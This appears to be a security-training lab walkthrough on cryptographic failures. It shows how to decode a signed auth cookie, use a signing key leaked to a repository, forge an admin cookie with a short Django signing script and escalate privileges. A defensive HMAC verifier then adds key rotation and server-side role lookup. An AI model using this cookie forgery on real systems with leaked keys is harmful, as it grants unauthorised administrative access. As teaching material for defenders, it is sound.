Cryptographic Failures
Privilege Escalation via Signed Cookie
- User ID: 101
- Role: guest
- Message: You are currently browsing with limited privileges.
How to Exploit
Step 1: Retrieve Auth Cookie
Open the browser Developer Tools and locate the auth cookie:
F12 → Application → Storage → Cookies → https://owasp.cyprian.dev
Locate the cookie named 'lab_auth'. Its value has a format similar to:
encoded_payload:signature
Step 2: Decode the Cookie
We are interested in the first part of the value, the encoded payload. Open the Console of the Developer Tools to decode it.
F12 → Console
In the prompt, type the following to decode the payload:
JSON.parse(atob("encoded_payload"))
The decoded payload outputs to:
{user_id: 101, role: 'guest'}
Step 3: Locate the Signing Key on GitHub
The signing key is similar to:
SIGNING_KEY = "dev-signing-key-please-rotate"
Exposure of signing keys in public repositories, backup files, or version control history is a common real-world mistake.
Once the key is known, an attacker can generate valid signatures for modified data, so the signature no longer proves that the server produced the cookie.
Step 4: Escalate Privilege
Change the JSON payload from
{user_id: 101, role: 'guest'}
to
{user_id: 1, role: 'admin'}
Step 5: Generate a Forged Cookie
Run the following script in a virtual environment on your local machine (it requires Django to be installed):
from django.core import signing

# Modified payload from Step 4
payload = {"user_id": 1, "role": "admin"}

# Sign it with the key recovered in Step 3; the server accepts any cookie signed with this key
forged_cookie = signing.dumps(payload, key="dev-signing-key-please-rotate")
print(forged_cookie)
This produces a valid signed cookie containing the modified role.
Step 6: Replace the Cookie in the Browser
Open Developer Tools
F12 → Application → Storage → Cookies → https://owasp.cyprian.dev
Replace the existing 'lab_auth' cookie value with the forged one.
Refresh the page.
Step 7: Observe Privilege Escalation
Because the forged cookie has a valid signature, the application trusts the modified role.
When you navigate to the top of the page, you should now see administrative content and the lab flag, confirming successful privilege escalation.
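The two defensive points this lab makes (Step 3: a key in source control is a leaked key; Step 7: whatever is inside a validly signed cookie is trusted) can be shown together in a small server-side verifier. The following is an added example, not the lab's code and not Django's: it uses a plain stdlib HMAC so it runs without Django. It assumes a hypothetical LAB_SIGNING_KEYS environment variable holding the current key first and any previous key after it (so old cookies survive a rotation window), and a constructed USER_ROLES store. The role is resolved from that store by user_id; the role claim carried in the cookie is never used for authorization. Key names and payloads are constructed for the demo.

```python
import base64
import hashlib
import hmac
import json
import os
from typing import List, Optional

def load_keys(env=None) -> List[str]:
    """Read signing keys from the environment (hypothetical LAB_SIGNING_KEYS),
    never from a constant in the repository. First key signs; all keys verify."""
    env = os.environ if env is None else env
    keys = [k for k in env.get("LAB_SIGNING_KEYS", "").split(",") if k]
    if not keys:
        raise RuntimeError("LAB_SIGNING_KEYS not set; refusing to start with a default key")
    return keys

def _b64(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def _sign(encoded_payload: str, key: str) -> str:
    mac = hmac.new(key.encode(), encoded_payload.encode(), hashlib.sha256).digest()
    return _b64(mac)

def make_cookie(payload: dict, key: str) -> str:
    """Issue a cookie in the lab's encoded_payload:signature shape."""
    encoded = _b64(json.dumps(payload, separators=(",", ":")).encode())
    return f"{encoded}:{_sign(encoded, key)}"

def verify_cookie(cookie: str, keys: List[str]) -> Optional[dict]:
    """Return the payload only if the signature matches one of the accepted keys.
    Comparison is constant-time; a rotated-out key is simply no longer in the list."""
    try:
        encoded, sig = cookie.rsplit(":", 1)
    except ValueError:
        return None
    for key in keys:
        if hmac.compare_digest(_sign(encoded, key), sig):
            padded = encoded + "=" * (-len(encoded) % 4)
            return json.loads(base64.urlsafe_b64decode(padded))
    return None

# Constructed server-side store: the cookie's own "role" field is ignored.
USER_ROLES = {1: "admin", 101: "guest"}

def effective_role(cookie: str, keys: List[str]) -> str:
    """Authorization decision: role comes from the server store, keyed by user_id."""
    payload = verify_cookie(cookie, keys)
    if payload is None:
        return "anonymous"
    return USER_ROLES.get(payload.get("user_id"), "anonymous")

if __name__ == "__main__":
    leaked = "dev-signing-key-please-rotate"          # the key from Step 3
    current = "new-key-from-secret-manager-EXAMPLE"    # constructed replacement
    cookie_under_leaked_key = make_cookie({"user_id": 1, "role": "admin"}, leaked)
    print("before rotation:", verify_cookie(cookie_under_leaked_key, [leaked]))
    print("after rotation: ", verify_cookie(cookie_under_leaked_key, [current]))
    claimed_admin = make_cookie({"user_id": 101, "role": "admin"}, current)
    print("role for user 101 claiming admin:", effective_role(claimed_admin, [current]))
```

Running it shows the cookie signed with the leaked key being accepted while that key is still trusted and rejected once only the new key is in the list, and a validly signed cookie for user 101 that claims "admin" still resolving to "guest". Rotation is what ends the lab's attack; the server-side lookup removes the role field as something worth forging at all.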